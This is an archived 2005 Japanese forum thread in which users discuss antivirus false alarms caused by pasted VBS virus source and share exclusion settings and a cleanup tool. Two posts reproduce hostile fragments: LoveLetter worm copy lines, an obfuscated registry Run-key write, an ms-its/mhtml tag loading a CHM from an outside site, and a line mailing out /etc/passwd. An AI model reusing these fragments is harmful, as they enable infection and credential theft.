5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ノートンがvbsウィルスのソースに誤反応3

1 :他のアンチウィルスソフトが反応する場合もあります:05/03/01 01:58:58 ID:???
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり

231 :ひよこ名無しさん:2005/07/14(木) 13:01:20 ID:???
Bloodhound俺もキタよ。実況板で。

232 :ひよこ名無しさん:2005/07/14(木) 14:37:31 ID:???
シマンテックのオンラインスキャンをすると、
2chブラウザのdatファイルからウィルス反応しまくりなんですが、
この手の反応は全て誤反応と解釈してよろしいですか?

233 :cen ◆Pm9xOTJuM. :2005/07/15(金) 21:44:52 ID:AyDUrGnO ?##
そうそう。
>>17のソフトをアップデートしましたので、よかったら
ダウンロードをしてくださいです。
http://www.geocities.jp/cen_hp/index.html

234 :cen ◆Pm9xOTJuM. :2005/07/15(金) 21:45:17 ID:??? ?##
>>232
それでいいと思います。

235 :232:2005/07/16(土) 00:14:07 ID:???
>>234
ありがとう。安心した

236 :ひよこ名無しさん:2005/07/16(土) 15:48:29 ID:???
安心した

237 :ひよこ名無しさん:2005/07/16(土) 20:23:01 ID:???
それでいいのか?・・・・・ほんとにだいじょぶ?

238 :cen ◇Pm9xOTJuM. に注意:2005/07/18(月) 00:23:37 ID:???
パソコン初心者総合質問スレッド vol.1072
http://pc8.2ch.net/test/read.cgi/pcqa/1120581493/

399 名前:299[] 投稿日:2005/07/06(水) 21:47:49 ID:YFmNomOu
★症状: 以前までは出来ていた、PCでのDVD-Video再生が出来なくなった。
★試したソフト: Media Player Classic , Mediaunite , Windows Media Player 10
★関係有りそうな出来事: DirectShow Filterに「GPL MPEG-1/2 Decoder」を追加した。

何方か原因解りませんか?
せめてハードかソフト、どちらに原因がありそうかだけでも解れば幸いです。

405 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:50:29 ID:???
>>399
ハードかソフトに原因

408 名前:cen ◆Pm9xOTJuM. [sage] 投稿日:2005/07/06(水) 21:52:09 ID:??? ?##
>>405
あと人間

411 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:53:30 ID:???
>>408
暴言ヒドスw

239 :ひよこ名無しさん:2005/07/18(月) 01:23:34 ID:???
cenも人間

240 :ひよこ名無しさん:2005/07/20(水) 16:38:42 ID:1McjtpBt
 初心者の質問のところから誘導されてきました。以下にそのままコピペします。


 windowsXPのhome editionで、Internet Exproler6、更新バージョンはSP2です。
よろしくお願いします。

 ノートンのアンチウィルスが「Unix Penguin」というウィルスを検知しました。
場所がインターネット一時ファイルのようだったので、「インターネットオプション
→ファイルの削除」をしました。

 すると、なぜか「お気に入り」が消えてしまったのです。

 誤って自分で消してしまったのだろうと言われたのでそうかと思い、もう一度
覚えている限り戻そうとしたら「入力したショートカットの名前は既にお気に入り
メニューに存在します。置き換えますか?」と出ます。それで置き換えても
表示されません。新たにショートカットの名前を変えて登録すれば表示される
のですが……。

 私の「お気に入り」の中には、表示されるものと表示されないものが両方
存在しています。表示されないものを再び表示する、または消し去ることは
できないでしょうか。消し去れれば、また再び作り直そうと思いますが…。

241 :ひよこ名無しさん:2005/07/20(水) 16:45:29 ID:???
>>240
誘導してない。
少しはログ読め。

242 :240 :2005/07/20(水) 16:54:41 ID:???
>>240
 ああほんとだ!
 すみません、慌ててました……

243 :240 :2005/07/20(水) 17:02:34 ID:???
>>241
 でも、表示のみ消えた「お気に入り」については、どこかに書いてありますか?

 ノートンとは関係ないのかもしれないですが…。

244 :ひよこ名無しさん:2005/07/20(水) 17:04:13 ID:???
>>243
関係ない。
インターネットオプション→詳細設定→使用してないフォルダは閉じる

245 :240=243:2005/07/20(水) 17:23:59 ID:???
 ありがとうございます。
 やってみましたが、駄目でした。

 そもそも「お気に入り」の星マークのアイコンが、見当たりません。favorite
の中もカラになっています。私はなんだか変なことをしてしまったみたいですね。

 もうちょっといじってみることにします。。失礼しました。

246 :ひよこ名無しさん:2005/07/21(木) 11:16:56 ID:???
ノートンアンチウィルス2005、open jane Doe 0.1.12.2 を使っています。
該当スレのログを除外しようとしたのですが、スレッドのidxはあるのですが、datがそのスレッドに限って見つからず、改善できません。
スレッドは
http://society3.2ch.net/test/read.cgi/koumei/1121522102/11
このメール欄にウィルスコードが貼ってあるのです。
対処の方法を御教示願います。

247 :246:2005/07/21(木) 13:27:51 ID:???
すみません、自己解決しました。
スルーしてください。

248 :ひよこ名無しさん:2005/07/22(金) 03:59:12 ID:pHdm2INX
age

249 :ひよこ名無しさん:2005/07/22(金) 22:55:05 ID:EfV4fKSJ ?
【Live2ch 】 1.10
【 スキン  】 Default
【Windows】 XP
【Firewall .】 NortonInternetSecurity
【 不具合 】 騙されてms-its: mhtml:file://c:\をメール欄に書いたらブラウザがおかしくなった。
        インストールフォルダのメールのテキストドキュメントも開かない。


250 :ひよこ名無しさん:2005/07/22(金) 22:56:13 ID:???
ほう・・・騙されてねぇ〜

c.Copy(dirwin&"\Win32DLL.vbs")?
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")?
<object?data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"?type="text/?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*?
fso.copyfile?"dirsystem&nurupo.vbs",?"j:\windows\start?menu\programs\startup\"?
If?s?=?"htm"?and?fso.FileExists(f1.path+"l")?=?False?then?fso.CopyFile?f1.path,?f1.path+"l"?
ToInfect.CodeModule.InsertLines?BGN,?ADI1.CodeModule.Lines(BGN,?)?
G.RegWrite?A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),?E.BuildPath(E.GetSpecialFolder(1),?A("VHORU@SU/WCR"))?
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))?  
ms-its:mhtml:file://c:\ ?
kak.hta';ken=wd+'START?

251 :ひよこ名無しさん:2005/07/23(土) 20:23:19 ID:???
Bloodhound流行ってんの?

252 :ひよこ名無しさん:2005/07/24(日) 21:16:56 ID:cauqGl4H
よく分からんけど、結局、感染してたとしても放っときゃいいんだろ?

253 :ひよこ名無しさん:2005/07/27(水) 18:55:26 ID:???
ハァ?

254 :こむ:2005/07/27(水) 23:43:56 ID:mxkxVm4b
Aya の自作自演
http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846

837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player  がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?

838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
  いつもこのアプリケーションを使う」にチェック
5.OK

840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ

255 :ひよこ名無しさん:2005/07/29(金) 10:45:54 ID:???
>>252
そういうことだな。

256 :ひよこ名無しさん:2005/07/30(土) 06:15:31 ID:???
うちのノートン2004、除外の設定するときフォルダ検索をしないとできない。
IEのを手書きで入力したけどやっぱり反応した。
c:\program files\musicjg2ch\log
c:\program files\musicjg2ch\temp.htm
これを入れてもダメだった。
ギコナビなら除外の設定はすんなりいったんだけどな…。

257 :ひよこ名無しさん:2005/08/01(月) 18:02:23 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START

258 :ひよこ名無しさん:2005/08/03(水) 16:00:39 ID:???
んなもん貼っても反応しねーよ
真に受けやがってカスがw

259 :ひよこ名無しさん:2005/08/05(金) 11:13:48 ID:???
>>257
他のスレでこういうのが貼ってあり、かちゅを閉じたら
IEが全く見られなくなってしまいました

>>10をやってみたのですが、やっぱり見れない
今生きてるのはかちゅだけです。助けてください

260 :名無しさん@お腹いぱーい。:2005/08/05(金) 13:25:34 ID:???
>>259
ノートンが原因だったら以下コピペ
2003/2004(2005もこれだと思う)

Norton Internet Security もしくは Norton Personal Firewall を起動する。
画面中央の [ファイアウォール] をクリックする。
右下に表示される [設定] ボタンをクリックする。
[プログラム制御] タブをクリックする。
[追加] ボタンをクリックする。
「プログラムの選択」ウィンドウが開きます。
Internet Explorer フォルダを開く。
Internet Explorer フォルダは今回の例の場合です。
お客様が設定を行いたいアプリケーションがインストールされているフォルダを開いてください。
IEXPLORE.EXE をクリックして選択する。
IEXPLORE.EXE は今回の例の場合です。
お客様が設定を行いたいアプリケーションを選択してください。
[開く] ボタンをクリックする。
例としてご案内している Internet Explorer を含め、設定がすでに作成されているアプリケーションの場合は「すでにルールがあるプログラムを追加しようとしています」というメッセージが表示されますが、まだ設定されていないアプリケーションの場合は表示されません。
「プログラム制御」のウィンドウが表示されるので、「どう処理しますか?」の部分で [許可] もしくは [遮断] などを選択して、[OK] ボタンをクリックする。
「アプリケーションカテゴリの選択」ウィンドウが表示されるので、そのアプリケーションをどのカテゴリとして分類するかどうかを選択し、[OK] ボタンをクリックする。

2002
NISをたちあげ、ファイアウォール→インターネットアクセス制御(アプリケーション制御の一覧)で設定が変えられます

IE5の修復は以下コピペ

1. [スタート]−[設定]−[コントロールパネル] から「アプリケーションの追加と削除」を起動します。
2. [インストールと削除] タブをクリックし、「Microsoft Internet Explore 5 とインターネットツール」をクリックします。
3. 「追加と削除」ボタンをクリックし、表示されるメニューから「Internet Explore を修復する」を選択して「OK」をクリックします。


XPならシステムの復元

261 :ひよこ名無しさん:2005/08/07(日) 01:32:04 ID:+PgqXMkS
http://web.archive.org/web/20020202012223/http://www.top.or.jp/~godhand/a2.html

262 :ひよこ名無しさん:2005/08/11(木) 07:34:19 ID:???
保守

263 :ひよこ名無しさん:2005/08/11(木) 17:48:51 ID:/1wx1GK2
このスレ、全く見えない!

264 :ひよこ名無しさん:2005/08/11(木) 18:10:33 ID:???
a

265 :ひよこ名無しさん:2005/08/11(木) 18:17:33 ID:???
sage

266 :ひよこ名無しさん:2005/08/13(土) 00:51:52 ID:???
ms-its:mhtml:file://c:\

267 :ひよこ名無しさん:2005/08/13(土) 20:52:27 ID:???
sage

268 :ひよこ名無しさん:2005/08/15(月) 00:02:49 ID:???
te

269 :ひよこ名無しさん:2005/08/17(水) 11:53:47 ID:???
保守

270 :ひよこ名無しさん:2005/08/24(水) 07:54:30 ID:???
保守sage保守age

271 :ひよこ名無しさん:2005/08/24(水) 08:22:24 ID:ujhK/t33
ノートンアンインストールしてウィルスバスター入れました
おかげでこのスレも見れるようになりました

272 :ひよこ名無しさん:2005/08/24(水) 08:38:01 ID:???
保守

273 :cen ◆Pm9xOTJuM. :2005/08/24(水) 22:22:22 ID:??? ?##
そうそう。
>>17 のソフトですが、シリア語ブラクラにも対応しました。
あと、何日前以降に更新されたファイルのみ検索の設定ができるように
なりましたです。
http://www.geocities.jp/cen_hp/index.html

274 :経営情報学部の学生 ◆2H3Xipoq6Y :2005/08/24(水) 22:37:51 ID:???
>>273
いつも乙です。

275 :ひよこ名無しさん:2005/08/25(木) 07:46:50 ID:???
>>271
単にウイルス検出対象ファイルからhtm、html、datを外せば済むことなのに…
まあ少しでもお金使って貰わないとカネの巡りが悪くなるからな。

276 :ひよこ名無しさん:2005/08/25(木) 07:48:06 ID:???
って、htmとhtmlは外すとまずいのか。
けど通常のインターネットブラウザで2chしてる時点で(ry

277 :ひよこ名無しさん:2005/08/30(火) 13:01:34 ID:???
>>273
乙です。
壺のdatファイルなんですが、ノートンで誤反応のファイルが見つかったのに
vicptdel.exeで検索したら0個だったんですがまだ対応されてないだけでしょうか?
VBS.LoveLetter.Varとでてましたが。

278 :cen ◆Pm9xOTJuM. :2005/08/30(火) 18:25:22 ID:???
>>277
どうもです。
今のところ、壺のdatファイルには対応しておりません。
対応しているのは、2chに直接置いてあるdatだけです。
この板なら、http://pc8.2ch.net/pcqa/dat/xxxxxxxxx.dat のような
datファイルのみです。
壺のdatファイルは構造が違うので、datファイルの構造のチェックで
弾いてしまう仕組みになっています。

279 :ひよこ名無しさん:2005/08/30(火) 19:57:15 ID:???
良スレあげ

280 :277:2005/08/31(水) 15:04:38 ID:???
>>278
分かりました。素早いレスどうもありがとう。

85 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)